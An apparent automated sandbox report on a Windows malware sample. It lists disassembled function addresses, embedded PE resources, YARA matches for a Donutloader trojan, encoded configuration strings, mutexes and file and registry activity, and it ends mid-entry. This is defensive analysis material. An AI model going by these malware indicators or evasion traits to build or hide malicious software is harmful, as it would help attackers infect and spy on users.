Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9345A20	6_2_00007FF8A9345A20
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A933CAC0	6_2_00007FF8A933CAC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9312AA0	6_2_00007FF8A9312AA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9346910	6_2_00007FF8A9346910
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A930D9C0	6_2_00007FF8A930D9C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93279B0	6_2_00007FF8A93279B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9322C40	6_2_00007FF8A9322C40
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932BC49	6_2_00007FF8A932BC49
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A931DC00	6_2_00007FF8A931DC00
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9321CA0	6_2_00007FF8A9321CA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932BCAF	6_2_00007FF8A932BCAF
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932BB5F	6_2_00007FF8A932BB5F
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9311B72	6_2_00007FF8A9311B72
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9313B00	6_2_00007FF8A9313B00
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932BB06	6_2_00007FF8A932BB06
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A931AB30	6_2_00007FF8A931AB30
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932BE34	6_2_00007FF8A932BE34
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A930CEE0	6_2_00007FF8A930CEE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9346EE9	6_2_00007FF8A9346EE9
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9309EF0	6_2_00007FF8A9309EF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932BEB0	6_2_00007FF8A932BEB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9345EB0	6_2_00007FF8A9345EB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9320D40	6_2_00007FF8A9320D40
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A934ED50	6_2_00007FF8A934ED50
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9305D44	6_2_00007FF8A9305D44
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9317DB0	6_2_00007FF8A9317DB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A931E050	6_2_00007FF8A931E050
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A931C0C0	6_2_00007FF8A931C0C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93350A0	6_2_00007FF8A93350A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A935E0A0	6_2_00007FF8A935E0A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932BF3E	6_2_00007FF8A932BF3E
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A931BF50	6_2_00007FF8A931BF50
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9362F60	6_2_00007FF8A9362F60
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A931AFA0	6_2_00007FF8A931AFA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9363FA0	6_2_00007FF8A9363FA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932C24B	6_2_00007FF8A932C24B
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932C262	6_2_00007FF8A932C262
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A933B270	6_2_00007FF8A933B270
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932B200	6_2_00007FF8A932B200
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93522C0	6_2_00007FF8A93522C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9306288	6_2_00007FF8A9306288
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932C29F	6_2_00007FF8A932C29F
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A936E2B0	6_2_00007FF8A936E2B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A930C1D0	6_2_00007FF8A930C1D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9332190	6_2_00007FF8A9332190
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A934F460	6_2_00007FF8A934F460
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93624C0	6_2_00007FF8A93624C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9350370	6_2_00007FF8A9350370
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9321330	6_2_00007FF8A9321330
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93383D0	6_2_00007FF8A93383D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9350390	6_2_00007FF8A9350390
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A933A650	6_2_00007FF8A933A650
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932B670	6_2_00007FF8A932B670
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93476D0	6_2_00007FF8A93476D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93356A0	6_2_00007FF8A93356A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9352560	6_2_00007FF8A9352560
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9340580	6_2_00007FF8A9340580
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9345870	6_2_00007FF8A9345870
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A932B897	6_2_00007FF8A932B897
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93238A0	6_2_00007FF8A93238A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9304703	6_2_00007FF8A9304703
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A930474F	6_2_00007FF8A930474F
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9304790	6_2_00007FF8A9304790
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93237F0	6_2_00007FF8A93237F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A934B7B0	6_2_00007FF8A934B7B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026EF7F8	6_2_026EF7F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026EF41C	6_2_026EF41C
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026F06DC	6_2_026F06DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026EE540	6_2_026EE540
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026F2ED4	6_2_026F2ED4
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026EFC28	6_2_026EFC28
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C500B	7_2_00007FF8489C500B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF8489B4DFB	9_2_00007FF8489B4DFB

Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF8A9353C4C appears 94 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF8A930A6D0 appears 32 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF8A930BB00 appears 48 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF8A930A3D0 appears 73 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF8A931CDC0 appears 54 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF8A9334A90 appears 46 times

Source: h40thEqmz6.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: h40thEqmz6.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: h40thEqmz6.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: h40thEqmz6.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: h40thEqmz6.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-UGL1J.tmp.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-UGL1J.tmp.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-CBKGS.tmp.4.dr

Static PE information: Number of sections : 11 > 10

Source: h40thEqmz6.exe, 00000000.00000003.1996919927.00000000024E2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs h40thEqmz6.exe
Source: h40thEqmz6.exe, 00000000.00000003.1997111463.000000007FE3E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs h40thEqmz6.exe

Source: h40thEqmz6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 6.2.regsvr32.exe.25c0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.regsvr32.exe.26e130d.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 6.2.regsvr32.exe.26e130d.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.regsvr32.exe.a5b04d.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 6.2.regsvr32.exe.a5b04d.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000006.00000002.3245140417.00000000025C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000006.00000002.3244688637.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, Settings.cs	Base64 encoded string: 'kSygpm1E7aAOujMHZ0/StPnSJY2viqeRt7smgjVcOMMDqeZzp2AKn8DeMAcvka9ckV95lR8j1CORbO0z3bhXYw==', 'nxA3lKPGVFipfZp/DDfki009vc7627jtoOjJ2bbJkzVnr0U8PK7Hyyuw2BOd8e7ZiJ3kN7XAw9OUr1HpRwVqNO90PN9045eIHPI6LpuF7U1yf0kHXzguoAfTQl4uMqKViwWmB8DVg6SEGXVhH9lyAfkMBPM/577MQMbdfdmW8zCLJuRu0aLYPU+0XFwXmZpTS2DKoruI+pnix8Smc0zQT8puhBzouEQKY98gqIdP+SP+RGe807Jf/cvWVyElsICCWpCGkZnjOr6KrrqDxRRbfmFiuXwGAbhBUq5gbsyssWiCsMXsB8QrN5YaWhTCD+CxT6iDMb1iuiM2i264hXyn3J++GxUWEZsc5aQq+r8q25mhxrtiOPR93YsHpYRk0gGshGjV6L1cuh2JVXv2Ph+4TfNS5I++qm9IKPLLxZExOovXgiNl1JNy4eMQOhRRQKC8CbHXuMOZYsohFlqqAXnFdNSOxcPfDqbM2mpThsIQTFRZIRhdvfCG89Y4GvuJykaQrwcWbIFU9M/rYSIU58rxhjbIn0iajwLuaTgs738tL494ON7u/KZbhRBl9Yt+y4ssCF6f66KQGD1MFGNRcAAfhD859DdLC6HhYpHM0XGdWq+cZFWSxqO7vyaVkHmQuqofyxt6Kqctqkrh3Kcs4O5uOhXEawA0/NR/4EDHpT3IKoy5DQBeLH+U/9UmgGcXygZVOPP085dDDrq+mDg9sO1aNLBkoIM+Teub8vr5K266igcyO8x3KnNZvFZgBgkqIBy7O/UGTC0lABqCoaypJVpn8cXag852RuOQpjYv6W1QoVDyIcbK2ni6rU7T030ba/Kzm0Sc3ScgmTRKZj64U2CXrB0q4D/PJyc/HfRJN0sP63w7vExVFbPK1QAn8/1FBGNfWQyYP9OeXTpXdUkuQwF7SArA98tzsk7JpQtmGJ0pK+JQP+p+lST0zF5Z8ZNCNwzZ3PfhQ1xc6eb0nmb0QaJvFwDjP1+KAScnelmMCt6xjmv/L9zKQdQhKeXk8mvLFA+gpyKz8S3LAFQr99ab81gKKbLY8U8lERl4PFwJAawp9Fk=', '+p2ln4TCAOeoVRgUtLxpNOZHRMT7dEptCbKqBfr8pu37fvYTtGiolfWxR2yrvbC5Z43rEJYdUSdLTwI5RxiN0l8UcgQfnILuBANozHKyIyM8KG054vTgbecz0mXr9z/saWmDhCrLCUEOi2gdPMDBD61ygzdbf5fTth8gf5CIz8hDkdV0bKZ6uAd9BM36X3U84Vl0qvPTqxrUWmCo6Kbz4p7hdh3x9O9Wut/Z0IqqyyTI8S6nHPERICPnaDh9/G3eJPt7CHR6s4TRjpF6NC1c3zHXI2ox8hGQFHEUVypmDnE=', 'lbdfC6M5sK6u7I1H+pAznYpPn5TBL+YVD4PhIdFhqoXJm+PYdBchGO9f8Y4Z3fNlwPKcVjmKKENv8wqxAxSdXw==', 'kUfn6rNnkLhLikJqrap5wjPca36G7JdE2ST3bMdB+6knlQ6aun7SOTdJF7sQZ6iV3U1nOK9fBOuEyTctxOB0Cg==', 'IXlMvvGfqHyO9T8m7SsHvSIkdCG72uFdmeEves5wHNILzJQzxzKS5rYprb86UmzFYGhrXLjSnlW1raFi1QvxrQ==', 'xANp/mrNjcC4VQCwEp9ljBc3a94p1HV++kbIGKZSZafWTXZIVxoWceXI+cIB6NK5lUw8MUrhIN5Ez0rdXL152A==', 'n9sSQ7otlJZ1DqSKeoA7qAS8ao9Eg6xMQPDIoWhNDKXSvxf1inB0zcE46EuDMtWgW2KJSibL8OWOXadfXhYOfg=='
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, Settings.cs	Base64 encoded string: 'kSygpm1E7aAOujMHZ0/StPnSJY2viqeRt7smgjVcOMMDqeZzp2AKn8DeMAcvka9ckV95lR8j1CORbO0z3bhXYw==', 'nxA3lKPGVFipfZp/DDfki009vc7627jtoOjJ2bbJkzVnr0U8PK7Hyyuw2BOd8e7ZiJ3kN7XAw9OUr1HpRwVqNO90PN9045eIHPI6LpuF7U1yf0kHXzguoAfTQl4uMqKViwWmB8DVg6SEGXVhH9lyAfkMBPM/577MQMbdfdmW8zCLJuRu0aLYPU+0XFwXmZpTS2DKoruI+pnix8Smc0zQT8puhBzouEQKY98gqIdP+SP+RGe807Jf/cvWVyElsICCWpCGkZnjOr6KrrqDxRRbfmFiuXwGAbhBUq5gbsyssWiCsMXsB8QrN5YaWhTCD+CxT6iDMb1iuiM2i264hXyn3J++GxUWEZsc5aQq+r8q25mhxrtiOPR93YsHpYRk0gGshGjV6L1cuh2JVXv2Ph+4TfNS5I++qm9IKPLLxZExOovXgiNl1JNy4eMQOhRRQKC8CbHXuMOZYsohFlqqAXnFdNSOxcPfDqbM2mpThsIQTFRZIRhdvfCG89Y4GvuJykaQrwcWbIFU9M/rYSIU58rxhjbIn0iajwLuaTgs738tL494ON7u/KZbhRBl9Yt+y4ssCF6f66KQGD1MFGNRcAAfhD859DdLC6HhYpHM0XGdWq+cZFWSxqO7vyaVkHmQuqofyxt6Kqctqkrh3Kcs4O5uOhXEawA0/NR/4EDHpT3IKoy5DQBeLH+U/9UmgGcXygZVOPP085dDDrq+mDg9sO1aNLBkoIM+Teub8vr5K266igcyO8x3KnNZvFZgBgkqIBy7O/UGTC0lABqCoaypJVpn8cXag852RuOQpjYv6W1QoVDyIcbK2ni6rU7T030ba/Kzm0Sc3ScgmTRKZj64U2CXrB0q4D/PJyc/HfRJN0sP63w7vExVFbPK1QAn8/1FBGNfWQyYP9OeXTpXdUkuQwF7SArA98tzsk7JpQtmGJ0pK+JQP+p+lST0zF5Z8ZNCNwzZ3PfhQ1xc6eb0nmb0QaJvFwDjP1+KAScnelmMCt6xjmv/L9zKQdQhKeXk8mvLFA+gpyKz8S3LAFQr99ab81gKKbLY8U8lERl4PFwJAawp9Fk=', '+p2ln4TCAOeoVRgUtLxpNOZHRMT7dEptCbKqBfr8pu37fvYTtGiolfWxR2yrvbC5Z43rEJYdUSdLTwI5RxiN0l8UcgQfnILuBANozHKyIyM8KG054vTgbecz0mXr9z/saWmDhCrLCUEOi2gdPMDBD61ygzdbf5fTth8gf5CIz8hDkdV0bKZ6uAd9BM36X3U84Vl0qvPTqxrUWmCo6Kbz4p7hdh3x9O9Wut/Z0IqqyyTI8S6nHPERICPnaDh9/G3eJPt7CHR6s4TRjpF6NC1c3zHXI2ox8hGQFHEUVypmDnE=', 'lbdfC6M5sK6u7I1H+pAznYpPn5TBL+YVD4PhIdFhqoXJm+PYdBchGO9f8Y4Z3fNlwPKcVjmKKENv8wqxAxSdXw==', 'kUfn6rNnkLhLikJqrap5wjPca36G7JdE2ST3bMdB+6knlQ6aun7SOTdJF7sQZ6iV3U1nOK9fBOuEyTctxOB0Cg==', 'IXlMvvGfqHyO9T8m7SsHvSIkdCG72uFdmeEves5wHNILzJQzxzKS5rYprb86UmzFYGhrXLjSnlW1raFi1QvxrQ==', 'xANp/mrNjcC4VQCwEp9ljBc3a94p1HV++kbIGKZSZafWTXZIVxoWceXI+cIB6NK5lUw8MUrhIN5Ez0rdXL152A==', 'n9sSQ7otlJZ1DqSKeoA7qAS8ao9Eg6xMQPDIoWhNDKXSvxf1inB0zcE46EuDMtWgW2KJSibL8OWOXadfXhYOfg=='
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, Settings.cs	Base64 encoded string: 'kSygpm1E7aAOujMHZ0/StPnSJY2viqeRt7smgjVcOMMDqeZzp2AKn8DeMAcvka9ckV95lR8j1CORbO0z3bhXYw==', 'nxA3lKPGVFipfZp/DDfki009vc7627jtoOjJ2bbJkzVnr0U8PK7Hyyuw2BOd8e7ZiJ3kN7XAw9OUr1HpRwVqNO90PN9045eIHPI6LpuF7U1yf0kHXzguoAfTQl4uMqKViwWmB8DVg6SEGXVhH9lyAfkMBPM/577MQMbdfdmW8zCLJuRu0aLYPU+0XFwXmZpTS2DKoruI+pnix8Smc0zQT8puhBzouEQKY98gqIdP+SP+RGe807Jf/cvWVyElsICCWpCGkZnjOr6KrrqDxRRbfmFiuXwGAbhBUq5gbsyssWiCsMXsB8QrN5YaWhTCD+CxT6iDMb1iuiM2i264hXyn3J++GxUWEZsc5aQq+r8q25mhxrtiOPR93YsHpYRk0gGshGjV6L1cuh2JVXv2Ph+4TfNS5I++qm9IKPLLxZExOovXgiNl1JNy4eMQOhRRQKC8CbHXuMOZYsohFlqqAXnFdNSOxcPfDqbM2mpThsIQTFRZIRhdvfCG89Y4GvuJykaQrwcWbIFU9M/rYSIU58rxhjbIn0iajwLuaTgs738tL494ON7u/KZbhRBl9Yt+y4ssCF6f66KQGD1MFGNRcAAfhD859DdLC6HhYpHM0XGdWq+cZFWSxqO7vyaVkHmQuqofyxt6Kqctqkrh3Kcs4O5uOhXEawA0/NR/4EDHpT3IKoy5DQBeLH+U/9UmgGcXygZVOPP085dDDrq+mDg9sO1aNLBkoIM+Teub8vr5K266igcyO8x3KnNZvFZgBgkqIBy7O/UGTC0lABqCoaypJVpn8cXag852RuOQpjYv6W1QoVDyIcbK2ni6rU7T030ba/Kzm0Sc3ScgmTRKZj64U2CXrB0q4D/PJyc/HfRJN0sP63w7vExVFbPK1QAn8/1FBGNfWQyYP9OeXTpXdUkuQwF7SArA98tzsk7JpQtmGJ0pK+JQP+p+lST0zF5Z8ZNCNwzZ3PfhQ1xc6eb0nmb0QaJvFwDjP1+KAScnelmMCt6xjmv/L9zKQdQhKeXk8mvLFA+gpyKz8S3LAFQr99ab81gKKbLY8U8lERl4PFwJAawp9Fk=', '+p2ln4TCAOeoVRgUtLxpNOZHRMT7dEptCbKqBfr8pu37fvYTtGiolfWxR2yrvbC5Z43rEJYdUSdLTwI5RxiN0l8UcgQfnILuBANozHKyIyM8KG054vTgbecz0mXr9z/saWmDhCrLCUEOi2gdPMDBD61ygzdbf5fTth8gf5CIz8hDkdV0bKZ6uAd9BM36X3U84Vl0qvPTqxrUWmCo6Kbz4p7hdh3x9O9Wut/Z0IqqyyTI8S6nHPERICPnaDh9/G3eJPt7CHR6s4TRjpF6NC1c3zHXI2ox8hGQFHEUVypmDnE=', 'lbdfC6M5sK6u7I1H+pAznYpPn5TBL+YVD4PhIdFhqoXJm+PYdBchGO9f8Y4Z3fNlwPKcVjmKKENv8wqxAxSdXw==', 'kUfn6rNnkLhLikJqrap5wjPca36G7JdE2ST3bMdB+6knlQ6aun7SOTdJF7sQZ6iV3U1nOK9fBOuEyTctxOB0Cg==', 'IXlMvvGfqHyO9T8m7SsHvSIkdCG72uFdmeEves5wHNILzJQzxzKS5rYprb86UmzFYGhrXLjSnlW1raFi1QvxrQ==', 'xANp/mrNjcC4VQCwEp9ljBc3a94p1HV++kbIGKZSZafWTXZIVxoWceXI+cIB6NK5lUw8MUrhIN5Ez0rdXL152A==', 'n9sSQ7otlJZ1DqSKeoA7qAS8ao9Eg6xMQPDIoWhNDKXSvxf1inB0zcE46EuDMtWgW2KJSibL8OWOXadfXhYOfg=='

Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/22@0/1

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00007FF8A931FC70 memset,FormatMessageW,GetLastError,HeapFree,HeapFree,

6_2_00007FF8A931FC70

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00007FF8A934B7B0 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,HeapFree,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,HeapFree,UnmapViewOfFile,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,UnmapViewOfFile,CloseHandle,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,HeapFree,HeapFree,GetLastError,HeapFree,

6_2_00007FF8A934B7B0

Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

File created: C:\Users\user\AppData\Local\unins000.dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\0no3m
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\gkggeeqkwjd

Source: C:\Users\user\Desktop\h40thEqmz6.exe

File created: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp

Jump to behavior

Source: C:\Users\user\Desktop\h40thEqmz6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\h40thEqmz6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp

